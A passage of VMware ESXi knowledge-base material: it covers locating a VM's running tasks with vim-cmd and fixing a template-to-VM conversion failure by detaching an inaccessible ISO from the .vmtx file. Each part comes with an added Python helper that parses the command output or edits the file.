      key = "haTask-112-vim.VirtualMachine.createSnapshot-3887",
      task = 'vim.Task:haTask-112-vim.VirtualMachine.createSnapshot-3887',
      description = (vmodl.LocalizableMessage) null,
      name = "vim.VirtualMachine.createSnapshot",
      descriptionId = "VirtualMachine.createSnapshot",
      entity = 'vim.VirtualMachine:112',
      entityName = "deploy-test",
      state = "running",
      cancelled = false,
      cancelable = false,
      error = (vmodl.MethodFault) null,
      result = ,
      progress = 15,
      reason = (vim.TaskReasonUser) {
         dynamicType = ,
         userName = "root",
      },
      queueTime = "2012-11-28T01:29:35.233835Z",
      startTime = "2012-11-28T01:29:35.234891Z",
      completeTime = ,
      eventChainId = 2936866,
      changeTag = ,
      parentTaskKey = ,
      rootTaskKey = ,
    }
...
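Steps 2 through 6 of the KB can be stitched together. The following is an added example (mine, not VMware's or the KB's) that parses saved task_list and getallvms output and returns, for a VM name, the full haTask keys to hand to task_info. The sample output is the KB's own, and the getallvms parser assumes VM names without spaces, since that table is only whitespace-aligned.

```python
import re

# one entry of task_list output: 'vim.Task:haTask-<entity>-<method>-<seq>'
TASK_RE = re.compile(
    r"'vim\.Task:(?P<key>haTask-(?P<entity>[^-']+)-(?P<method>[^-']+)-(?P<seq>\d+))'"
)
# one VM row of getallvms output; assumes VM names without spaces, since the
# table is only whitespace-aligned
VM_ROW_RE = re.compile(r"^\s*(?P<vmid>\d+)\s+(?P<name>\S+)\s+\[", re.MULTILINE)


def parse_task_list(output):
    """Task entries from `vim-cmd vimsvc/task_list` output (step 2) as dicts."""
    return [m.groupdict() for m in TASK_RE.finditer(output)]


def vmids_by_name(getallvms_output):
    """Map VM name -> Vmid from `vim-cmd vmsvc/getallvms` output (steps 3 and 4)."""
    return {m.group("name"): m.group("vmid") for m in VM_ROW_RE.finditer(getallvms_output)}


def tasks_for_vm(task_list_output, getallvms_output, vm_name):
    """Full haTask keys of the tasks whose entity is `vm_name` (what steps 5 and 6 do by hand).

    The whole key, not just the trailing number, is what task_info expects in step 7.
    """
    vmid = vmids_by_name(getallvms_output).get(vm_name)
    if vmid is None:
        return []
    return [t["key"] for t in parse_task_list(task_list_output) if t["entity"] == vmid]


# sample output taken from the KB text above (task list shortened)
TASK_LIST = """\
(ManagedObjectReference) [
   'vim.Task:haTask-112-vim.VirtualMachine.createSnapshot-3887',
   'vim.Task:haTask-pool21-vim.ResourcePool.updateConfig-33252',
   'vim.Task:haTask-pool22-vim.ResourcePool.updateConfig-33253'
]
"""
GETALLVMS = """\
Vmid  Name   File                        Guest OS              Version   Annotation
112   VM-1   [Datastore] VM-3/VM-3.vmx   winLonghornGuest      vmx-04
128   VM-2   [Datastore] VM-3/VM-3.vmx   winXPProGuest         vmx-04
144   VM-3   [Datastore] VM-3/VM-3.vmx   winNetStandardGuest   vmx-04
"""

if __name__ == "__main__":
    for key in tasks_for_vm(TASK_LIST, GETALLVMS, "VM-1"):
        print("vim-cmd vimsvc/task_info", key)
```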

Converting a template to a virtual machine fails with the error: A component of the virtual machine is not accessible on the host (1021563)


Cause


This issue occurs when a component (for example, a virtual CD-ROM) is attached to the virtual machine but, is no longer accessible or valid.

Resolution


To work around this issue, remove the device from the virtual machine's .vmtx file.
To remove the device from the virtual machine's .vmtx file:
  1. Log in to the ESXi/ESX host service console as root from a Secure Shell (SSH) session or directly from the console of the server.
  2. Unregister the virtual machine from vCenter Server. Right-click the virtual machine and click Remove from Inventory.
  3. Go to the .vmtx file of the virtual machine by changing to its directory on the Virtual Machines File System (VMFS) volume:

    cd /vmfs/volumes/LUN_A/virtualmachine
  4. Make a backup of the .vmtx file with the command:

    cp vm_name.vmtx vm_name.bak
  5. Open the .vmtx file in a text editor and look for entries similar to:

    ide1:0.clientDevice = "FALSE"
    ide1:0.deviceType = "cdrom-image"
    ide1:0.fileName = "/vmfs/volumes/storage1/ISO/winxp.iso"

    Note: For vSphere 5.5 substitute ide1:0.clientDevice = "FALSE" for ide1:0.present = "FALSE"
  6. Change the entries to:

    ide1:0.clientDevice = "TRUE"
    ide1:0.deviceType = "atapi-cdrom"
    ide1:0.fileName = ""

    Note: For vSphere 5.5 substitute ide1:0.clientDevice = "TRUE" for ide1:0.present = "TRUE"
  7. Re-register the virtual machine. To re-register a virtual machine, perform one of these options:
  • Re-register a virtual machine on ESX with the command:

    vmware-cmd -s register vm_name.vmtx
  • Re-register a virtual machine on ESXi with the command:

    vim-cmd solo/registervm /vmfs/volumes/datastore_name/VM_directory/VM_name.vmtx
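Steps 4 to 6 are a mechanical edit of key = "value" lines, so here is an added example of mine (not VMware's) that does them on the .vmtx text. It only touches the device when it is still backed by an ISO (deviceType cdrom-image), uses ide1:0.present instead of ide1:0.clientDevice when told it is vSphere 5.5 per the KB note, and writes vm_name.bak before rewriting the file. The .vmtx fragment is constructed.

```python
import re
import shutil
from pathlib import Path

# one .vmtx/.vmx entry:   key = "value"
ENTRY_RE = re.compile(r'^\s*(?P<key>[^\s=]+)\s*=\s*"(?P<value>.*)"\s*$')


def parse_vmx(text):
    """Key/value pairs of a .vmtx file; blank lines and anything not key = "value" are ignored."""
    entries = {}
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if m:
            entries[m.group("key")] = m.group("value")
    return entries


def detach_iso(text, device="ide1:0", vsphere55=False):
    """Rewrite the entries for `device` as steps 5 and 6 describe, if it is still ISO-backed.

    Returns (new_text, changed). Per the KB note the attach flag is <device>.clientDevice
    before vSphere 5.5 and <device>.present on 5.5, so the caller says which one applies.
    """
    entries = parse_vmx(text)
    if entries.get(device + ".deviceType") != "cdrom-image":
        return text, False  # not backed by an ISO image: nothing to change
    flag_key = device + (".present" if vsphere55 else ".clientDevice")
    new_values = {
        flag_key: "TRUE",
        device + ".deviceType": "atapi-cdrom",
        device + ".fileName": "",
    }
    out = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if m and m.group("key") in new_values:
            key = m.group("key")
            line = '%s = "%s"' % (key, new_values[key])
        out.append(line)
    return "\n".join(out) + "\n", True


def fix_vmtx_file(path, device="ide1:0", vsphere55=False):
    """Steps 4 to 6 on disk: copy vm_name.vmtx to vm_name.bak, then rewrite the entries in place."""
    path = Path(path)
    new_text, changed = detach_iso(path.read_text(), device, vsphere55)
    if changed:
        shutil.copy2(path, path.with_suffix(".bak"))
        path.write_text(new_text)
    return changed


# constructed .vmtx fragment (not a real template) with the entries from step 5
SAMPLE_VMTX = '''\
.encoding = "UTF-8"
displayName = "template-test"
ide1:0.present = "TRUE"
ide1:0.clientDevice = "FALSE"
ide1:0.deviceType = "cdrom-image"
ide1:0.fileName = "/vmfs/volumes/storage1/ISO/winxp.iso"
'''

if __name__ == "__main__":
    fixed, changed = detach_iso(SAMPLE_VMTX)
    print(fixed if changed else "nothing to do")
```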